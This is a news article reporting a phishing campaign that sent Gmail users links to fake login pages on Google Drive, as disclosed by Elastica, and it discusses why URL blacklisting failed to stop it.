Gmail has been used to distribute the emails containing links to the bogus Webpages hosted on the Google Drive, stolen credentials are then stored on a third party domain.
Although researchers are not certain whether the Gmail account got compromised or attackers just created a phony account, still, phishing emails got delivered with 100% success rate and built-in spam filter of Google was not able to detect them.
All of the components of this phishing attack were in perfect working condition, when it was reported by the Elastica to Google – just two weeks ago prior to this announcement. Surprisingly, the phishing pages aren’t been removed as of now by the Giant even after being alerted two weeks ago. Perhaps, Google is waiting for everyone to get to know this in an attempt to lose users’ trust, right? This is something not good for sure.
Architect of Elastica Cloud Threat Labs, Dr. Aditya K Sood said, “In this particular incident, attackers were able to circumvent tight security controls and target Google users specifically to gain access to a multitude of services associated with Google accounts”.
Standard blacklisting via URLs and IP addresses isn’t of that much use, because the bogus webpages are hosted on the Google Drive. Typical intrusion detection & prevention systems can’t provide any aid in such scenarios either. It goes without questioning that the stolen credentials can be sold by attackers on black market online, or they simply can use them for malicious purposes. As the user base of Google services is exceptional, the risks are beyond our imagination as well.
Below is the video of this phishing campaign in action: